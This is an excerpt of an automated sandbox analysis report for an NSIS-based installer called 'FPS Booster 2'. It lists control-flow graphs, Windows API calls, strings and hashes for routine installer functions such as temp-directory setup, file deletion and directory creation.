6ffb1c06 KillTimer 6795->6796 6797 
6ffb1000 6798 6ffb101c 6797->6798 6799 6ffb1007 SendMessageW 6797->6799 6799->6798 6800 6e9e1060 6801 6e9e15a3 3 API calls 6800->6801 6803 6e9e107c 6801->6803 6802 6e9e10e5 6803->6802 6804 6e9e1859 4 API calls 6803->6804 6805 6e9e109a 6803->6805 6804->6805 6806 6e9e1859 4 API calls 6805->6806 6807 6e9e10aa 6806->6807 6808 6e9e10ba 6807->6808 6809 6e9e10b1 GlobalSize 6807->6809 6810 6e9e10be GlobalAlloc 6808->6810 6811 6e9e10cf 6808->6811 6809->6808 6812 6e9e1880 2 API calls 6810->6812 6813 6e9e10da GlobalFree 6811->6813 6812->6811 6813->6802

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 193 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 200 403947-40394a 193->200 201 40394f-403963 call 405d32 CharNextW 193->201 200->201 204 4039f6-4039fc 201->204 205 403a02 204->205 206 403968-40396e 204->206 207 403a21-403a39 GetTempPathW call 4037f8 205->207 208 403970-403976 206->208 209 403978-40397c 206->209 219 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 207->219 220 403a5f-403a79 DeleteFileW call 4035b3 207->220 208->208 208->209 210 403984-403988 209->210 211 40397e-403983 209->211 213 4039e4-4039f1 call 405d32 210->213 214 40398a-403991 210->214 211->210 213->204 228 4039f3 213->228 217 403993-40399a 214->217 218 4039a6-4039b8 call 40382c 214->218 223 4039a1 217->223 224 40399c-40399f 217->224 233 4039ba-4039c1 218->233 234 4039cd-4039e2 call 40382c 218->234 219->220 231 403af8-403b07 call 403885 OleUninitialize 219->231 220->231 232 403a7b-403a81 220->232 223->218 224->218 224->223 228->204 247 403bfa-403c00 231->247 248 403b0d-403b1d call 405ccc ExitProcess 231->248 235 403ae1-403ae8 call 405958 232->235 236 403a83-403a8c call 405d32 232->236 238 4039c3-4039c6 233->238 239 4039c8 233->239 234->213 249 403a04-403a1c call 40824c call 406035 234->249 246 403aed-403af3 call 406113 235->246 250 403aa5-403aa7 236->250 238->234 238->239 239->234 246->231 253 403c02-403c1f call 406328 * 3 247->253 254 403c7d-403c85 247->254 249->207 258 403aa9-403ab3 250->258 259 403a8e-403aa0 call 40382c 250->259 286 403c21-403c23 253->286 287 403c69-403c74 ExitWindowsEx 253->287 260 403c87 254->260 261 403c8b 254->261 266 403b23-403b3d lstrcatW lstrcmpiW 258->266 267 403ab5-403ac5 call 4067aa 258->267 259->258 274 403aa2 259->274 260->261 266->231 271 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 266->271 267->231 280 403ac7-403add call 406035 * 2 267->280 272 403b62-403b82 call 406035 * 2 271->272 273 
403b57-403b5d call 406035 271->273 294 403b87-403ba3 call 406831 DeleteFileW 272->294 273->272 274->250 280->235 286->287 288 403c25-403c27 286->288 287->254 291 403c76-403c78 call 40141d 287->291 288->287 292 403c29-403c3b GetCurrentProcess 288->292 291->254 292->287 299 403c3d-403c5f 292->299 300 403be4-403bec 294->300 301 403ba5-403bb5 CopyFileW 294->301 299->287 300->294 302 403bee-403bf5 call 406c94 300->302 301->300 303 403bb7-403bd7 call 406c94 call 406831 call 405c6b 301->303 302->231 303->300 313 403bd9-403be0 CloseHandle 303->313 313->300
                                                APIs
                                                • #17.COMCTL32 ref: 004038CE
                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                • OleInitialize.OLE32(00000000), ref: 004038E0
                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                • OleUninitialize.OLE32(?), ref: 00403AFD
                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                • API String ID: 2435955865-3712954417
                                                • Opcode ID: ac3f82c8583c87bde93f90980a1070f9faa323d75b06bd3b84399b38fb4e9a16
                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                • Opcode Fuzzy Hash: ac3f82c8583c87bde93f90980a1070f9faa323d75b06bd3b84399b38fb4e9a16
                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 691 406cc7-406ce1 call 4067aa 694 406ce3-406cf5 DeleteFileW 691->694 695 406cfa-406d05 691->695 696 406ef9-406efb 694->696 697 406d07-406d09 695->697 698 406d19-406d2d call 406035 695->698 699 406e77-406e7c 697->699 700 406d0f-406d13 697->700 707 406d39-406d3a call 40677d 698->707 708 406d2f-406d37 lstrcatW 698->708 702 406ef7-406ef8 699->702 703 406e7e-406e82 699->703 700->698 700->699 702->696 705 406e84-406e89 703->705 706 406e8b-406e92 call 406301 703->706 709 406ee1-406eee call 4062cf 705->709 706->702 717 406e94-406eb7 call 40674e call 4062cf call 405e5c RemoveDirectoryW 706->717 710 406d3f-406d43 707->710 708->710 709->702 714 406d45-406d4d 710->714 715 406d4f-406d55 lstrcatW 710->715 714->715 718 406d57-406d78 lstrlenW FindFirstFileW 714->718 715->718 741 406ef0-406ef2 call 404f9e 717->741 742 406eb9-406ebd 717->742 721 406e67 718->721 722 406d7e-406d93 call 405d32 718->722 723 406e69-406e6c 721->723 729 406d95-406d99 722->729 730 406d9e-406da2 722->730 723->699 726 406e6e-406e73 723->726 726->699 729->730 732 406d9b 729->732 733 406dc0-406dd0 call 406035 730->733 734 406da4-406dab 730->734 732->730 747 406dd2-406dda 733->747 748 406de7-406e04 call 4062cf call 405e5c DeleteFileW 733->748 737 406db1-406db4 734->737 738 406e44-406e56 FindNextFileW 734->738 737->733 743 406db6-406dba 737->743 738->722 740 406e5c-406e65 FindClose 738->740 740->723 741->702 745 406edc 742->745 746 406ebf-406eda call 4062cf call 404f9e call 406c94 742->746 743->733 743->738 745->709 746->702 747->738 751 406ddc-406de5 call 406cc7 747->751 761 406e06-406e0a 748->761 762 406e3d-406e3f call 404f9e 748->762 751->738 764 406e29-406e3b call 4062cf 761->764 765 406e0c-406e27 call 4062cf call 404f9e call 406c94 761->765 762->738 764->738 765->738
                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,004CF0A0), ref: 00406CE4
                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                Strings
                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                • ptF, xrefs: 00406D1A
                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                • \*.*, xrefs: 00406D2F
                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                • API String ID: 2035342205-1650287579
                                                • Opcode ID: f7a733ba7b7dda8f767778852903590a58a16c07b963c85795d8b3373a8eb2b2
                                                • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                • Opcode Fuzzy Hash: f7a733ba7b7dda8f767778852903590a58a16c07b963c85795d8b3373a8eb2b2
                                                • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 861 406831-40683c 862 40683e-40684d 861->862 863 40684f-406863 861->863 862->863 864 406865-406872 863->864 865 40687b-406881 863->865 864->865 866 406874-406877 864->866 867 406887-406888 865->867 868 406aad-406ab6 865->868 866->865 871 406889-406896 867->871 869 406ac1-406ac2 868->869 870 406ab8-406abc call 406035 868->870 870->869 873 406aab-406aac 871->873 874 40689c-4068ac 871->874 873->868 875 4068b2-4068b5 874->875 876 406a86 874->876 877 406a89 875->877 878 4068bb-4068f9 875->878 876->877 879 406a99-406a9c 877->879 880 406a8b-406a97 877->880 881 406a19-406a22 878->881 882 4068ff-40690a GetVersion 878->882 883 406a9f-406aa5 879->883 880->883 886 406a24-406a27 881->886 887 406a5b-406a64 881->887 884 406928 882->884 885 40690c-406914 882->885 883->871 883->873 891 40692f-406936 884->891 885->884 890 406916-40691a 885->890 888 406a37-406a46 call 406035 886->888 889 406a29-406a35 call 405f7d 886->889 892 406a72-406a84 lstrlenW 887->892 893 406a66-406a6d call 406831 887->893 902 406a4b-406a51 888->902 889->902 890->884 895 40691c-406920 890->895 897 406938-40693a 891->897 898 40693b-40693d 891->898 892->883 893->892 895->884 901 406922-406926 895->901 897->898 903 406979-40697c 898->903 904 40693f-406965 call 405eff 898->904 901->891 902->892 905 406a53-406a59 call 406064 902->905 907 40698c-40698f 903->907 908 40697e-40698a GetSystemDirectoryW 903->908 916 406a05-406a09 904->916 917 40696b-406974 call 406831 904->917 905->892 910 406991-40699f GetWindowsDirectoryW 907->910 911 4069fb-4069fd 907->911 909 4069ff-406a03 908->909 909->905 909->916 910->911 911->909 915 4069a1-4069ab 911->915 918 4069c5-4069db SHGetSpecialFolderLocation 915->918 919 4069ad-4069b0 915->919 916->905 921 406a0b-406a17 lstrcatW 916->921 917->909 923 4069f6-4069f8 918->923 924 4069dd-4069f4 SHGetPathFromIDListW CoTaskMemFree 918->924 919->918 922 4069b2-4069b9 919->922 921->905 926 4069c1-4069c3 922->926 923->911 924->909 924->923 926->909 926->918
                                                APIs
                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                • GetSystemDirectoryW.KERNEL32(Show,00002004), ref: 00406984
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • GetWindowsDirectoryW.KERNEL32(Show,00002004), ref: 00406997
                                                • lstrcatW.KERNEL32(Show,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                • lstrlenW.KERNEL32(Show,00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406A73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                • String ID: Show$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 3581403547-2066119300
                                                • Opcode ID: 297fba6cd9e7c7e3f7edb2b2bb5f8a466a25db9789c8a0bf07f022a95d38d7f5
                                                • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                • Opcode Fuzzy Hash: 297fba6cd9e7c7e3f7edb2b2bb5f8a466a25db9789c8a0bf07f022a95d38d7f5
                                                • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                APIs
                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: jF
                                                • API String ID: 2295610775-3349280890
                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 27 4030ee-4030f2 1->27 4 401601-401611 call 4062cf 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062cf SetFileAttributesW 2->8 9 401650-40166d call 40137e call 4062cf call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062cf call 405d85 2->10 11 401672-401686 call 40145c call 4062cf 2->11 12 401693-4016ac call 401446 call 4062cf 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062cf call 404f9e 2->14 15 4016d6-4016db 2->15 16 401736-40173d 2->16 17 401897-4018a7 call 40145c call 406301 2->17 18 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062cf SetForegroundWindow 2->20 4->27 38 401751-401755 ShowWindow 5->38 39 401758-40175f 5->39 61 4019a3-4019a8 6->61 62 40197f-401984 6->62 7->1 67 4019ec-4019f8 7->67 8->1 80 40179a-4017a6 call 4062cf 8->80 9->27 104 401864-40186c 10->104 105 4017de-4017fc call 405d32 CreateDirectoryW 10->105 81 401689-40168e call 404f9e 11->81 86 4016b1-4016b8 Sleep 12->86 87 4016ae-4016b0 12->87 13->27 35 401632-401637 14->35 33 401702-401710 15->33 34 4016dd-4016fd call 401446 15->34 37 4030dd-4030de 16->37 82 4018c2-4018d6 call 4062cf 17->82 83 4018a9-4018bd call 4062cf 17->83 116 401912-401919 18->116 117 40191e-401921 18->117 19->35 36 401647-40164e PostQuitMessage 19->36 20->1 33->1 34->1 35->27 36->35 37->1 56 4030de call 405f7d 37->56 38->39 39->1 41 401765-401769 ShowWindow 39->41 41->1 56->1 74 4019af-4019b2 61->74 73 401986-401989 62->73 62->74 67->1 67->37 73->74 84 40198b-401993 call 406301 73->84 74->1 88 4019b8-4019c5 GetShortPathNameW 74->88 99 4017ab-4017ac 80->99 81->1 82->27 83->27 84->61 109 401995-4019a1 call 406035 84->109 86->1 87->86 88->1 99->1 107 401890-401892 104->107 108 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 104->108 120 401846-40184e call 4062cf 105->120 121 4017fe-401809 GetLastError 105->121 107->81 108->1 109->74 116->81 122 401923-40192b call 406301 117->122 123 40194a-401950 117->123 135 401853-401854 120->135 126 401827-401832 GetFileAttributesW 121->126 127 40180b-401825 GetLastError call 4062cf 121->127 122->123 140 40192d-401948 call 406c94 call 404f9e 122->140 125 401957-40195d call 4062cf 123->125 125->99 133 401834-401844 call 4062cf 126->133 134 401855-40185e 126->134 127->134 133->135 134->104 134->105 135->134 140->125
                                                APIs
                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                • ShowWindow.USER32(?), ref: 00401753
                                                • ShowWindow.USER32(?), ref: 00401767
                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                • SetCurrentDirectoryW.KERNEL32(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                Strings
                                                • Rename on reboot: %s, xrefs: 00401943
                                                • BringToFront, xrefs: 004016BD
                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                • Call: %d, xrefs: 0040165A
                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                • Rename failed: %s, xrefs: 0040194B
                                                • Sleep(%d), xrefs: 0040169D
                                                • Aborting: "%s", xrefs: 0040161D
                                                • SetFileAttributes failed., xrefs: 004017A1
                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                • detailprint: %s, xrefs: 00401679
                                                • Rename: %s, xrefs: 004018F8
                                                • Jump: %d, xrefs: 00401602
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                • API String ID: 2872004960-3619442763
                                                • Opcode ID: b3b674945a8ce1646f82cd1a2970868ccc34f917f5dbcfb57dbe7a977c86b510
                                                • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                • Opcode Fuzzy Hash: b3b674945a8ce1646f82cd1a2970868ccc34f917f5dbcfb57dbe7a977c86b510
                                                • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                Control-flow Graph

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 6FFB18A4
                                                • HeapAlloc.KERNEL32(00000000), ref: 6FFB18A7
                                                • GetProcessHeap.KERNEL32(00000000,00000000,error,?,00000000,?,?,?,?,00000000,00000000), ref: 6FFB18E9
                                                • RtlFreeHeap.NTDLL(00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 6FFB1B4E
                                                  • Part of subcall function 6FFB1E83: GlobalAlloc.KERNELBASE(00000040,?,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1E99
                                                  • Part of subcall function 6FFB1E83: lstrcpynW.KERNEL32(00000004,00000104,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1EAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess$FreeGloballstrcpyn
                                                • String ID: BUTTON$COMBOBOX$EDIT$LINK$LISTBOX$NSIS: nsControl pointer property$RICHEDIT_CLASS$RichEdit$STATIC$error
                                                • API String ID: 1913068523-3375361224
                                                • Opcode ID: 338ecf551f453f9fda7fb7afd7eca21a177edb66853a5e14375405a10e84b2ad
                                                • Instruction ID: 13751149430b9cc2a350ed92b31e57b6093b593d07756c569b4f33cbdacbc717
                                                • Opcode Fuzzy Hash: 338ecf551f453f9fda7fb7afd7eca21a177edb66853a5e14375405a10e84b2ad
                                                • Instruction Fuzzy Hash: C1819072D54608EBDB219FA6CE85F9ABBBCFF09394F018119E904B7250D735E9148FA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
